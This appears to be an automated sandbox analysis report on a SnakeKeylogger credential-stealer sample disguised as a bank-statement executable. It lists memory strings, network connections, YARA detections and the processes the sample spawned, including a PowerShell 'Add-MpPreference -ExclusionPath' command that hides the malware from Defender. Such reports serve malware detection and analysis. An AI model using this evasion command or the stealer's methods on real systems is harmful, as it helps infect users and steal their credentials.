                  Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FDF000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E04000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002D6F000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002DDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: hesaphareketi-01.exe, 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002D6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002DDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                  Source: hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E04000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002D99000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002DDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
                  Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FDF000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FDF000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002ECA000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002EBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002EBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/(
                  Source: hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002EC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49732 version: TLS 1.2

                  System Summary

                  barindex
                  Source: 4.2.hesaphareketi-01.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 4.2.hesaphareketi-01.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 4.2.hesaphareketi-01.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.hesaphareketi-01.exe.477ad90.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.hesaphareketi-01.exe.477ad90.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.hesaphareketi-01.exe.477ad90.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.hesaphareketi-01.exe.4917370.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.hesaphareketi-01.exe.4917370.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.hesaphareketi-01.exe.4917370.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.hesaphareketi-01.exe.4917370.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.hesaphareketi-01.exe.4917370.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.hesaphareketi-01.exe.477ad90.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.hesaphareketi-01.exe.477ad90.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: hesaphareketi-01.exe PID: 5860, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: hesaphareketi-01.exe PID: 5508, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_0133D5DC0_2_0133D5DC
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_02D16FE80_2_02D16FE8
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_02D100400_2_02D10040
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_02D100070_2_02D10007
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_02D16FD80_2_02D16FD8
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_06F645780_2_06F64578
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_06F607C00_2_06F607C0
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_06F607AF0_2_06F607AF
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_06F694D80_2_06F694D8
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_06F645680_2_06F64568
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_06F602780_2_06F60278
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_06F602680_2_06F60268
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_06F6708A0_2_06F6708A
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_06F699E80_2_06F699E8
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_06F679300_2_06F67930
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_011DC1464_2_011DC146
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_011D53624_2_011D5362
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_011DD2784_2_011DD278
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_011DC4684_2_011DC468
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_011DC7384_2_011DC738
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_011DE9884_2_011DE988
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_011D69A04_2_011D69A0
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_011D29E04_2_011D29E0
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_011DCA084_2_011DCA08
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_011D9DE04_2_011D9DE0
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_011DCCD84_2_011DCCD8
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_011DCFAA4_2_011DCFAA
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_011D6FC84_2_011D6FC8
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_011D3E094_2_011D3E09
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_011DF9794_2_011DF979
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_011DE97A4_2_011DE97A
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_0567D7104_2_0567D710
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_056770C04_2_056770C0
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_056735604_2_05673560
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_056745004_2_05674500
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_056725C04_2_056725C0
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_05676DA04_2_05676DA0
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_05671C604_2_05671C60
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_056764404_2_05676440
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_05672C004_2_05672C00
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_05670CC04_2_05670CC0
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_056754A04_2_056754A0
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_056767604_2_05676760
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_056767504_2_05676750
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_05672F204_2_05672F20
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_05670FE04_2_05670FE0
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_056757C04_2_056757C0
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_05671F804_2_05671F80
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_05674E604_2_05674E60
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_0567EE484_2_0567EE48
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_056716204_2_05671620
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_0567EE3B4_2_0567EE3B
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_05675E004_2_05675E00
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_05673EC04_2_05673EC0
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_056706804_2_05670680
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_056719404_2_05671940
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_056761204_2_05676120
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_056741E04_2_056741E0
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_056799C84_2_056799C8
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_056709A04_2_056709A0
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_056751804_2_05675180
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_056700404_2_05670040
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_056748204_2_05674820
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_056700064_2_05670006
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_056728E04_2_056728E0
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_056738804_2_05673880
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_056703604_2_05670360
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_05674B404_2_05674B40
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_056703504_2_05670350
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_056713004_2_05671300
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_05673BA04_2_05673BA0
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_05676A704_2_05676A70
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_056732404_2_05673240
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_05675AE04_2_05675AE0
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_056722A04_2_056722A0
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4_2_05676A804_2_05676A80
                  Source: hesaphareketi-01.exe, 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs hesaphareketi-01.exe
                  Source: hesaphareketi-01.exe, 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs hesaphareketi-01.exe
                  Source: hesaphareketi-01.exe, 00000000.00000000.1432378454.0000000000902000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenametEaO.exeH vs hesaphareketi-01.exe
                  Source: hesaphareketi-01.exe, 00000000.00000002.1461505822.00000000072B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs hesaphareketi-01.exe
                  Source: hesaphareketi-01.exe, 00000000.00000002.1457581741.0000000002ED2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs hesaphareketi-01.exe
                  Source: hesaphareketi-01.exe, 00000000.00000002.1445396850.00000000010DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs hesaphareketi-01.exe
                  Source: hesaphareketi-01.exe, 00000004.00000002.3893452216.0000000000446000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs hesaphareketi-01.exe
                  Source: hesaphareketi-01.exe, 00000004.00000002.3893621321.00000000009B7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs hesaphareketi-01.exe
                  Source: hesaphareketi-01.exeBinary or memory string: OriginalFilenametEaO.exeH vs hesaphareketi-01.exe
                  Source: hesaphareketi-01.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 4.2.hesaphareketi-01.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 4.2.hesaphareketi-01.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 4.2.hesaphareketi-01.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.hesaphareketi-01.exe.477ad90.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.hesaphareketi-01.exe.477ad90.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.hesaphareketi-01.exe.477ad90.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.hesaphareketi-01.exe.4917370.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.hesaphareketi-01.exe.4917370.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.hesaphareketi-01.exe.4917370.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.hesaphareketi-01.exe.4917370.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.hesaphareketi-01.exe.4917370.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.hesaphareketi-01.exe.477ad90.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.hesaphareketi-01.exe.477ad90.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: hesaphareketi-01.exe PID: 5860, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: hesaphareketi-01.exe PID: 5508, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: hesaphareketi-01.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 0.2.hesaphareketi-01.exe.4917370.0.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.hesaphareketi-01.exe.4917370.0.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.hesaphareketi-01.exe.4917370.0.raw.unpack, Bc-.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.hesaphareketi-01.exe.477ad90.3.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.hesaphareketi-01.exe.477ad90.3.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.hesaphareketi-01.exe.477ad90.3.raw.unpack, Bc-.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, NyvrOwANqHHPpEqfI2.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, NyvrOwANqHHPpEqfI2.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, NyvrOwANqHHPpEqfI2.csSecurity API names: _0020.AddAccessRule
                  Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, x42tUDawqVMVIAc1ru.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, NyvrOwANqHHPpEqfI2.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, NyvrOwANqHHPpEqfI2.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, NyvrOwANqHHPpEqfI2.csSecurity API names: _0020.AddAccessRule
                  Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, x42tUDawqVMVIAc1ru.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/6@4/4
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hesaphareketi-01.exe.logJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4324:120:WilError_03
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vvkkfpcb.wd0.ps1Jump to behavior
                  Source: hesaphareketi-01.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: hesaphareketi-01.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: hesaphareketi-01.exe, 00000000.00000000.1432378454.0000000000902000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: select * from [card] where [card].id = (select employees.[card] from employees where employees.id =quse employees; select [name] from department where id =
                  Source: hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002FA6000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002FCB000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002F97000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002F88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: hesaphareketi-01.exeReversingLabs: Detection: 23%
                  Source: hesaphareketi-01.exeVirustotal: Detection: 60%
                  Source: unknownProcess created: C:\Users\user\Desktop\hesaphareketi-01.exe "C:\Users\user\Desktop\hesaphareketi-01.exe"
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe"
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess created: C:\Users\user\Desktop\hesaphareketi-01.exe "C:\Users\user\Desktop\hesaphareketi-01.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe"Jump to behavior
